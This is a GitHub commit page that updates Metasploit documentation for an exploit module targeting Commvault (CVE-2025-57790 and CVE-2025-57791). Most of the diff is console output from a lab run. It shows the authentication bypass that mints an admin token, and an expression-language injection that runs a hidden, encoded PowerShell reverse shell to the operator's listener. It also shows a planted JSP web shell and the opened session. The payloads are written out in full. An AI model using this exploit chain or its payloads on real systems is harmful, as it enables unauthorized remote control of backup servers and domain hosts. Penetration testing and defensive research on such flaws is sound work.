Skip to content

Commit eddc81f

Browse files
remmons-r7remmons-r7
authored
Update commvault_rce_cve_2025_57790_cve_2025_57791.md
Update the example usage terminal output to reflect module changes.
1 parent 12b78c0 commit eddc81f

File tree

1 file changed

+24
-16
lines changed

1 file changed

+24
-16
lines changed

documentation/modules/exploit/windows/http/commvault_rce_cve_2025_57790_cve_2025_57791.md

Lines changed: 24 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -31,10 +31,12 @@ Module options (exploit/windows/http/commvault_rce_cve_2025_57790_cve_2025_57791
3131
3232
Name Current Setting Required Description
3333
---- --------------- -------- -----------
34-
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, socks5h, http, sapni, socks4
35-
RHOSTS 192.168.154.173 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
34+
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies
35+
: socks5, socks5h, http, sapni, socks4
36+
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basic
37+
s/using-metasploit.html
3638
RPORT 443 yes The target port (TCP)
37-
SSL true yes Negotiate SSL/TLS for outgoing connections
39+
SSL true no Negotiate SSL/TLS for outgoing connections
3840
TARGETURI / yes The base path to Commvault
3941
VHOST no HTTP server virtual host
4042
@@ -43,7 +45,7 @@ Payload options (cmd/windows/powershell_reverse_tcp):
4345
4446
Name Current Setting Required Description
4547
---- --------------- -------- -----------
46-
LHOST 192.168.154.139 yes The listen address (an interface may be specified)
48+
LHOST yes The listen address (an interface may be specified)
4749
LOAD_MODULES no A list of powershell modules separated by a comma to download over the web
4850
LPORT 4444 yes The listen port
4951
@@ -58,38 +60,44 @@ Exploit target:
5860
5961
View the full module info with the info, or info -d command.
6062
63+
msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > set RHOSTS 192.168.154.222
64+
RHOSTS => 192.168.154.222
65+
msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > set LHOST 192.168.154.139
66+
LHOST => 192.168.154.139
6167
msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > set VERBOSE true
6268
VERBOSE => true
63-
msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > check
69+
msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > run
70+
[*] Started reverse TCP handler on 192.168.154.139:4444
71+
[*] Running automatic check ("set AutoCheck false" to disable)
6472
[*] Attempting to query the publicLink.do endpoint
6573
[*] The server returned a body that included the string cv-gorkha, looks like Commvault
6674
[+] Fetched GUID: 572131A8-3182-4423-8850-4A62D6CA2178
6775
[*] Attempting to login as PublicSharingUser
68-
[+] Authenticated as PublicSharingUser, got token: QSDK 34bf02a14954ba56882d9614fb3dfb8d81f8c9f6ae1b180cf7008674f44701dd6e12073182cd57fe736b0dd023e8985feba3ad28fc0d509c6364fe553ddc09ffc05beeeebf0b041baed00d5927ada3d14902085942e84952538dfcee2e69539c76f6e388d8b7ad5c672eab2383f6fbe7760a3061d4b7515ff5320b6169935d239cf9322fa09e0107f0ad5750cf7dfa9eec22e5ff5e46e2e6706ba765cf8b6e059d03e1fd6a86ef6ba50ba229f6217b64a35815a82b2c63347c913d5e66945273ed4d3fcc73dd0a03a119592168550be06
69-
[+] 192.168.154.173:443 - The target is vulnerable. Successfully authenticated as PublicSharingUser
70-
msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > run
71-
[*] Started reverse TCP handler on 192.168.154.139:4444
72-
[!] AutoCheck is disabled, proceeding with exploitation
76+
[+] Authenticated as PublicSharingUser, got token: QSDK 36fdc5bd8cd650a1e64d8bd00acec802097a131806f2c712b41d7abf0b3e26d63f934db1efb85444ba371710bd6135bc41f679bf4d923417fc191864f9772780ddc7c7e66c73b7b59721b9acc7ac32bab5fc4d89909a0771229e5e0fd0b51c6ff346b195eb53e4f92c31182701ce7eb78f4a11b0c4653ef48f6e902b61094c9b50ae05715890e9bb9e341b99d003956e1f036a82295f23cf637c8d4046f5c970ad46deb59e3d89579d5dc144f2582e3ae3659c17f19835c40cb8c93c96f063d58d41f2b328e39fda3d2c7e26af2d62bbf
77+
[+] The target is vulnerable. Successfully authenticated as PublicSharingUser
7378
[*] Attempting to query the publicLink.do endpoint
7479
[*] The server returned a body that included the string cv-gorkha, looks like Commvault
7580
[+] Fetched GUID: 572131A8-3182-4423-8850-4A62D6CA2178
7681
[*] Attempting PublicServiceUser login using: 572131A8-3182-4423-8850-4A62D6CA2178
77-
[+] Authenticated as PublicSharingUser, got token: QSDK 3d68d1d2b797e29d96dced010003dc2b8b30c298d87bd24754009afe40bb38921cf7f2e800a4cc43b5c3bda15b06e1a563225a4e08fb4814847ea8f601e9ac6a2405082bf37bcc3d87f493800359c0e0d340b3b12f464b6f1a12756ac218b3e6dc34ebe589b9aca40351512a50d421c9901ebc3952db9c798a3a2d17b94642a7c47861eadd1737666aea2ef49ae62d70efe080f1d6e879bce0dd3dd56cb4f233867a3fa314f192ceb380a5bacefd715ba4e90c4e0a53461ba041c68f183ba771640151f24a508e4ceca6387cec475dd84
82+
[+] Authenticated as PublicSharingUser, got token: QSDK 388eef6d67c3cf146a17819125e4b33506fd188ec21fe6d191b56cdf1e98527d84135f8508ad2439a6229bc5b44d6a71e83460596c3267113d8365867d834004463aeb263ef8b5a1ecaad5f0f44e310223317e29b987ea8b3311666ce34ddd30121c77652628fd975ce662e21c113c53414806e4fffcf2082b245f9f64f6f20716df1ed46f7da21c6b933bd9c1eabaf7cc8600644f399057a73598e60bf586d6b3c3717fa7fd0e9a4204dae938cb213f855f8eb48ffc37f3a1d38ca74176d919253cdb6405ce27287f4106eb0a5397093
7883
[*] Attempting to query authenticated API endpoint to get host name and OS
7984
[+] Got target host name: DC01
8085
[+] Got target host OS: Windows
8186
[*] Attempting to mint a localadmin token using hostname: DC01
8287
[+] Successfully bypassed authentication
83-
[*] Admin token: QSDK 3ec7146da31ce17e7698106e52c813be5d188db27103adf8595059b31935fbe6c1750ca468c2bc02cf514093cb4196f56fd5197bd84c5ca966b803d3b556a2b69be08dae5d4ac3bc7a4e967e2cf94263bb6ce11f4eb02b3f4b70943de18cdd7f21e119493ba98c87bb396f5484f9cd3b08ccbfef3a06b9dc38e20cb7904d4bdd59ea09f6d084c56d2269d0a6a8a4ad96b7c33a2ad18fe1978839494db8b6d6c87205fadab0466cafee879299154c1a40f573d026762c1084c8c65cba0a56efccf3dfe38adc2fb38e09b5c8cfbc22527d13ce872d80b8e3984f89b6e2efd3972384b77d23706264c33c63428ddcea4b9eea8054153c39ab867
88+
[*] Admin token: QSDK 39cb9de328b232215e42c09650a018488634454cb0f39875976ca7d16039ea739a20ea151935c84b458bd9991b826e46dddccdbe95abfd13b72e0a3b5eb6238cf089302d340f4b421d9f250669b3624fc2d0e4b871db59bc96fe955b8e7d88034d35e310e1c22d717ea1d8a01f5dadfccaf2910128cbe089fce9738bb549c2c6e5aeff59c0644345f3dffe1c73103d8372af95b5e73f018d3fa413727af1592f72d7fc036fdf060d5a6cf183ba1651ab69c5dbdcee110d7a9d01ef490c90fa1ea0fdc1afc52ba5f5ee8b58ee4349efc92c086d4c2ab1be97123385e78ca8f68ae3f88b1142382013438226acdc4e6b10701120f07d6acd1f7
8489
[*] Extracted localadmin user ID number: 4
8590
[*] Got JSON response, searching for installation path disclosures
8691
[+] Leaked the installation path: C:\Program Files\Commvault\ContentStore
92+
[*] Got user description: System created Admin User for qcommand operations
8793
[*] Uploading XML file: <App_GetUserPropertiesRequest level="30">
8894
<user userName="DC01_localadmin__" /></App_GetUserPropertiesRequest>
89-
[*] Updating user description: <App_UpdateUserPropertiesRequest><users><AppMsg.UserInfo><userEntity><userId>4</userId></userEntity><description>${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('powershell -w hidden -nop -e YwBtAGQALgBlAHgAZQAgAC8AYwAgACcAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBuAG8AbgBpACAALQBlAHAAIABiAHkAcABhAHMAcwAgACIAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEAUABPAHUAdQAyAGcAQwBBADUAVgBWAFgAVwAvAGIATgBoAFIAOQA5ADYAKwA0AE0ATgBSAEcAUQBtAHoAQwA5AHIAcABoAEQAWgBDAGkAbgBwAG8ATwBBAGIATABXAHEATABMAGwAdwBUAEEAUQBtAHIAcQBPAHQAZABDAGsAUwAxAHsAMgB9AHgAagBjAFQALwBmAGEAUgB7ADEAfQBmAFQAaABPAHMASgBZAFAAdABzAGgANwBlAFgAaAA0ADcAaQBHADUAeQBBAFUAegBtAFIAVAB3AEoANQByACsARABjADQAWgB6ADEAQQBZADYARAB4ADIAdwBMAFoAZwB3ACsAQQBjAHYAdQBDAG0ALwAzAFgAKwAnACcAKwAnACcATAB6AEkARAAvAGUAdgBkAEcAcgAvAFEARgBkAHAAQgBRADIAeAArAFgATwBSAFgAeQBlAFIAdgBqAFoAOQB3AFEAWABOAHUAWQBvAFcAcABqAFcAUwBVAGEAdwBzAFIARwBKAFYAagBuAFQAVgBSAGMAcgBzAGoAegB6AEwAcwBlAEcAdQBrAHkAdQAzAHMATwA0AHUAewAyAH0ANABsAHAAdQBVAE4AbQBlAFoAUQBkAEYAZgB7ADEAfQBJAFYAWABZAFgAbAA5AHoAUQB4AHsAMgB9AGgATgAzAHMAeQBDAFcAcQB4AFUAVgBhAGUAOQB3AE4ATgBHAGMAUwBmAEYAcwA4AEoAUABjAEMAQwA1AHAAVwBvAHgARwBIAGwATgBKAGgAbABxAEQARgAyAEEAbAAwADUAeQBqAEkALwBnAHgAagB7ADIAfQBCAE0AeQBSAFkAUQBWAHMAdABBAEgANwA5AEQAZAA1ADYASgB0AEIAcwBWAHcAWABKAGUATQBaAGQAbgAyAHEAQgBBAFoAUwBkAFAAawA1ADMAOQBYAGgARwBuAFcAaQBMAFoAUABSAHAATgByAHQAbgA2AHkAbQBmAE0AMwB0AGwAMgBQAEoARgBvAFEANQBWAHgANgAvAHEAVgBpADYAZwB2ADAAWABrAHIAYgA4AHcAWQByAG8AMABGAEwATQAnACcAKwAnACcAcwBSAGwAbABUADIAcgA5AEYAVgArAEkAQgB7ADIAfQA0AHoASABqAEcAcgBwAFYAOABwAGUAWQB4AHgATwAvAFUASABmADQAZgBrAFMARwB2AC8AMQBPAGgAcgArACsASQAnACcAKwAnACcAOABOAGYAMwBuAGQANwBiAGkAJwAnACsAJwAnAGQAKwArAFUANABwAG8AVABZAHsAMgB9ADYAYwByAHgATABlAEcASgB0AFYAcABTAGoARgBtAGUARABjAE8AeQBRAGkAVgBCADUANQBhAHUATAAwAGkATABuAHQAWQA4AHEAYwBCAGUAWQBZAGcAcwBWADUAbgBaAGsAYQBSAHsAMgB9AEQAZgAzACcAJwArACcAJwA2AHYAVwBCAGgAYgBZAFcAOQA4AEQARwA0AHQAdQBoADcANgBGAE0ATgAwADQATQA1ADMAMwBBACcAJwArACcAJwBsAEQAYwBhAG8AVABMAGIASQBHAEQAWAA0AEQAKwBWAFoAUwBwADMAMwBZAHMAcgA1AG4ATABMADcAVwBSAFMAOQBRAEkAZQBNAGMANwBOADAAeABuAFcAVAB4AHYAcABWAGIAUQB7ADIAfQBSAGMAOQA3AHIARwBxADYASABvADYANABuADEATQBhAHIAaABXAG8AMgAyAGwAWgB5AE8AdAA4AFoAbgBNADUAbQBnAGYAdAAzAGwAaAB3AFEATQBoAHIAWQA5AHYAVABtAGMAYgBEADMAWQBxAE4ASQBxADMAQQA0AE4AYgBnADEAQgBBAFcAVABxAGYAUAA3ADIAZABrADQAaQBTADgAdgBJADEAZQBBAFAAMQB4AE8AMgBMADIAeAB4AHAAVQBiAEQAJwAnACsAJwAnAFIATgAzAHQASgBJAGwAYwBnADQAcQBGADgASgBtAGcANQBVAG4AMQA5AGEAOABYAFQAaQBGAEEATQBYACcAJwArACcAJwBEAG0AZQBzAEoAZAAvAFIAUAA3AFoAaQB0AFYAQgAxAGcAYwByAFgATwBUAFIATwA4AEYAYgBGAGMANwAxAFIAMgB0AHoAUQBRAHgAaABIADgAbABUAHsAMQB9AGwAdABWAHcAWQBpAHsAMgB9AFYAYQBTADEAVQBvAFMAbQBEAHMARgBuAE4ASgAnACcAKwAnACcARwBoAFIAYQA3AEEAZABNAHkAYQAyADQARgBkADYAVwBYAGcANQB5AFkAMgB1AEQAWQBiAE8AeAAzAHEARABYAGQATQBnAFYAaQAnACcAKwAnACcAagB1AHoAYgBQAHUAbwBPAHQAUgB0AEoAeAAwAFoANgAnACcAKwAnACcAZQBkAFUAbQBwADcATwA0AE0AcABDAE8AbABuADgAaABVAEIAcQBuAGoALwBQAHQAWgByADEAVwBhAG8ATAB5AHAAYQBXAGMAdwBrAHsAMgB9AG0AYQBnAHYAbgBDAGEAcgBvAGUAMQBhAGUASABCAFAAUgA2AFQAYQBiAFgAbQBsAFYAVQBqAFIAMAA2AFYANABrAFAAZgBZAHYAOQBpAHUAcgBiAGIAYQA2AGwAMgBqADcATgB1AFcAMgBpAHcAegBqAG0AewAxAH0AWQBaAEkAWAByAHkAawAxADgAUQA1AHEARwBwAGMAZAA2AE0ATwBoAEIAJwAnACsAJwAnAGMATQBBACsAZwByADUAQQBHAEIAeABKAGUAdQBIADAAdwAvAFQAYQBhAHYAbgBhAGsAKwBIAFAAcQBVAHMAaABoAGMAWQBYAFgAdgBNAEcAeABaADQAMgA2AHEAaQAwADAAUAB4ADEAVQBlAHkAdQB7ADEAfQBoAFcAQwBMAEgAcABXAFQAWABzADQAWABUAEcAUAA5AGcAMwA5ADYAdQBvAHIAdwBVAGMAZgAzAGcANwBoAEMAYgA3AG0AcABsACsAaQBnAGoAZgBQAEEAZABRAEkAQwBrAHsAMQB9AHEANABGAE0ANABtAFMAUgB3AFkAdgA4AEwALwBhADgAawB7ADIAfQB6AHcAYwBrAFEAawAxAFMAeABmADkAQQBDAGMATgB5AE4AWQBSAEMAVgBBAHAAcQBhAGEARAAyAGMARgBpAEwAZABaAEYAbgBEAEMATwBWAEkAWABSAFMAdwB6AE8AMgB4ADEANwAxAEwAYQBkAFkAdwBQAC8AawBIADgAYgBtAFAAOQAxAGIATgB1AHcAUgAzADYAdAA1AG4AegBtAHUAVgA3AFcAcgA2AEcALwBlAFAAegBkAEgAbgBPAHAAMABlACsAbgBPAEkANwBWAEcAOQBVACcAJwArACcAJwAyAFQAUABOAHcASgBVAGEAdQBxADkAZgB7ADIAfQAvADEAcABuADEAZwA5ADkAWABUAHYALwBZAHYAMABIAGQAVwBxADkAewAyAH0AcQA0AEkAQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBFACcAJwAsACcAJwBLACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACIAJwA=').getInputStream()).useDelimiter('%5C%5CA').next()}</description></AppMsg.UserInfo></users></App_UpdateUserPropertiesRequest>
90-
[*] Powershell session session 1 opened (192.168.154.139:4444 -> 192.168.154.173:50327) at 2025-09-05 22:51:42 -0500
91-
^C
92-
[-] run: Interrupted
95+
[*] Updating user description: <App_UpdateUserPropertiesRequest><users><AppMsg.UserInfo><userEntity><userId>4</userId></userEntity><description>${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('powershell -w hidden -nop -e YwBtAGQALgBlAHgAZQAgAC8AYwAgACcAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBuAG8AbgBpACAALQBlAHAAIABiAHkAcABhAHMAcwAgACIAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARABBAC8AeQBHAGcAQwBBADUAVgBWAFgAVwAvAGIATgBoAFIAOQA5ADYAKwA0AE0ATgBSAEcAUQBtAHoAQwA5AHIAcABoAEQAWgBDAGkAbgBwAG8ATwBBAGIATABXAHEATABMAGwAdwBUAEEAUQBtAHIAcQBPAHQAZABDAGsAUwAxAHsAMgB9AHgAagBjAFQALwBmAGEAUgB7ADEAfQBmAFQAaABPAHMASgBZAFAAdABzAGgANwBlAFgAaAA0ADcAaQBHADUAeQBBAFUAegBtAFIAVAB3AEoANQByACsARABjADQAWgB6ADEAQQBZADYARAB4ADIAdwBMAFoAZwB3ACsAQQBjACcAJwArACcAJwB2AHUAQwBtAC8AMwBYACsATAB6AEkARAAvAGUAdgBkAEcAcgAvAFEARgBkAHAAQgBRADIAeAArAFgATwBSAFgAeQBlAFIAdgBqAFoAOQB3AFEAWABOAHUAWQBvAFcAcABqAFcAUwBVAGEAdwBzAFIARwBKAFYAagBuAFQAVgBSAGMAcgBzAGoAegB6AEwAcwBlAEcAdQBrAHkAdQAzAHMATwA0AHUAewAyAH0ANABsAHAAdQBVAE4AbQBlAFoAUQBkAEYAZgB7ADEAfQBJAFYAWABZAFgAbAA5AHoAUQB4AHsAMgB9AGgATgAzAHMAeQBDAFcAcQB4AFUAVgBhAGUAOQB3AE4ATgBHAGMAUwBmAEYAcwA4AEoAUABjAEMAQwA1AHAAVwBvAHgARwBIAGwATgBKAGgAbABxAEQARgAyAEEAbAAwADUAeQBqAEkALwBnAHgAagB7ADIAfQBCAE0AeQBSAFkAUQBWAHMAdABBAEgANwA5AEQAZAA1ADYASgB0AEIAcwBWAHcAWABKAGUATQBaAGQAbgAyAHEAQgBBAFoAUwBkAFAAawA1ADMAOQBYAGgARwBuAFcAaQBMAFoAUABSAHAATgByAHQAbgA2ACcAJwArACcAJwB5AG0AZgBNADMAdABsADIAUABKAEYAbwBRADUAVgB4ADYALwBxAFYAaQA2AGcAdgAwAFgAawByAGIAOAB3AFkAcgBvADAARgBMAE0AcwBSAGwAbABUADIAcgA5AEYAVgArAEkAQgB7ADIAfQA0AHoASABqAEcAcgBwAFYAOABwAGUAWQB4AHgATwAvAFUASABmADQAZgBrAFMARwB2AC8AMQBPAGgAcgArACsASQA4AE4AZgAzACcAJwArACcAJwBuAGQANwBiAGkAZAArACsAVQA0AHAAbwBUAFkAewAyAH0ANgBjAHIAeABMAGUARwBKAHQAVgBwAFMAagBGAG0AZQBEAGMATwB5AFEAaQBWAEIANQA1AGEAdQBMADAAaQBMAG4AdABZADgAcQBjAEIAZQBZAFkAZwBzAFYANQBuAFoAawBhAFIAewAyAH0ARABmADMANgB2AFcAQgBoAGIAWQBXADkAOABEAEcANAB0ACcAJwArACcAJwB1AGgANwA2AEYATQBOADAAJwAnACsAJwAnADQATQA1ADMAMwBBAGwARABjAGEAbwBUAEwAYgBJAEcARABYADQARAArAFYAWgBTAHAAMwAzAFkAcwByADUAbgBMAEwANwBXAFIAUwA5AFEASQBlAE0AYwA3AE4AMAB4AG4AVwBUAHgAdgBwAFYAYgBRAHsAMgB9AFIAYwA5ADcAcgBHAHEANgBIAG8ANgA0AG4AMQBNAGEAcgBoAFcAbwAyADIAbABaAHkATwB0ADgAWgBuAE0ANQBtAGcAZgB0ADMAbABoAHcAUQBNAGgAcgBZADkAdgBUAG0AYwBiAEQAMwBZAHEATgBJAHEAMwBBADQATgBiAGcAMQBCACcAJwArACcAJwBBAFcAVABxAGYAUAA3ADIAZABrADQAaQBTADgAdgBJADEAZQBBAFAAMQB4AE8AMgBMADIAeAB4AHAAVQBiAEQAUgBOADMAdABKAEkAbABjAGcANABxAEYAOABKAG0AZwA1AFUAbgAxADkAYQA4AFgAVABpAEYAQQBNAFgARABtAGUAJwAnACsAJwAnAHMASgBkAC8AUgBQADcAWgBpAHQAVgBCADEAZwBjAHIAWABPAFQAUgBPADgARgBiAEYAYwA3ADEAUgAyAHQAegBRAFEAeABoAEgAOABsAFQAewAxAH0AbAB0AFYAdwBZAGkAewAyAH0AVgBhAFMAMQBVAG8AUwBtAEQAcwBGAG4ATgBKAEcAaABSAGEANwBBAGQATQB5AGEAMgA0AEYAZAA2AFcAWABnADUAeQBZADIAdQBEAFkAYgBPAHgAMwBxAEQAWABkAE0AZwBWAGkAagB1AHoAYgBQAHUAbwBPAHQAUgB0AEoAeAAwAFoANgBlAGQAVQBtAHAANwBPADQATQBwAEMATwBsAG4AOABoAFUAQgBxAG4AagAvAFAAdABaAHIAMQBXAGEAbwBMAHkAcABhAFcAYwB3AGsAewAyAH0AbQBhAGcAdgBuAEMAYQByAG8AZQAxAGEAZQBIAEIAUABSADYAVABhAGIAWABtAGwAVgBVAGoAUgAwADYAVgAnACcAKwAnACcANABrAFAAZgBZAHYAOQBpAHUAcgBiAGIAYQA2ACcAJwArACcAJwBsADIAagA3AE4AdQBXADIAaQB3AHoAagBtAHsAMQB9AFkAWgBJAFgAcgB5AGsAMQA4AFEANQBxACcAJwArACcAJwBHAHAAYwBkADYATQBPAGgAQgBjAE0AQQArAGcAcgA1AEEARwBCAHgASgBlAHUASAAwAHcALwBUAGEAYQB2AG4AYQBrACsASABQAHEAVQBzAGgAaABjAFkAWABYAHYATQBHAHgAWgA0ADIANgBxAGkAMAAwAFAAeAAxAFUAZQB5AHUAewAxAH0AaABXAEMATABIAHAAVwBUAFgAcwA0AFgAVABHAFAAOQBnADMAOQA2AHUAbwByAHcAVQBjAGYAMwBnADcAaABDAGIANwBtAHAAbAArAGkAZwBqAGYAUABBAGQAUQBJAEMAawB7ADEAfQBxADQARgBNADQAbQBTAFIAdwBZAHYAOABMAC8AYQA4AGsAewAyACcAJwArACcAJwB9AHoAdwBjAGsAUQBrADEAUwB4AGYAOQBBAEMAYwBOAHkATgBZAFIAQwBWAEEAcABxAGEAYQBEADIAYwBGAGkATABkAFoARgBuAEQAQwBPAFYASQBYAFIAUwB3AHoATwAyAHgAMQA3ADEATABhAGQAWQB3AFAALwBrAEgAOABiAG0AUAA5ADEAYgBOAHUAdwBSADMANgB0ADUAbgB6AG0AdQAnACcAKwAnACcAVgA3AFcAcgA2AEcAJwAnACsAJwAnAC8AZQBQAHoAZABIAG4ATwBwADAAZQArAG4ATwBJADcAVgBHADkAVQAyAFQAUABOAHcASgBVAGEAdQBxADkAZgB7ADIAfQAvADEAcABuADEAZwA5ADkAWABUAHYALwBZAHYAMABIAGQAVwBxADkAewAyAH0AcQA0AEkAQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBFACcAJwAsACcAJwBLACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACIAJwA=').getInputStream()).useDelimiter('%5C%5CA').next()}</description></AppMsg.UserInfo></users></App_UpdateUserPropertiesRequest>
96+
[*] Moving XML file to web shell: qoperation execute -af C:\Program Files\Commvault\ContentStore\Reports\MetricsUpload\Upload\b2e65d7a\b2e65d7a.xml -file C:\Program Files\Commvault\ContentStore\Apache\webapps\ROOT\b2e65d7a.jsp
97+
[*] Accessing the web shell file: b2e65d7a.jsp
98+
[!] Tried to delete C:\Program Files\Commvault\ContentStore\Apache\webapps\ROOT\b2e65d7a.jsp, unknown result
99+
[*] Powershell session session 1 opened (192.168.154.139:4444 -> 192.168.154.222:50011) at 2025-09-15 11:33:22 -0500
100+
[*] Updating user description: <App_UpdateUserPropertiesRequest><users><AppMsg.UserInfo><userEntity><userId>4</userId></userEntity><description>System created Admin User for qcommand operations</description></AppMsg.UserInfo></users></App_UpdateUserPropertiesRequest>
93101
msf exploit(windows/http/commvault_rce_cve_2025_57790_cve_2025_57791) > sessions -i 1
94102
[*] Starting interaction with 1...
95103

0 commit comments

Comments
 (0)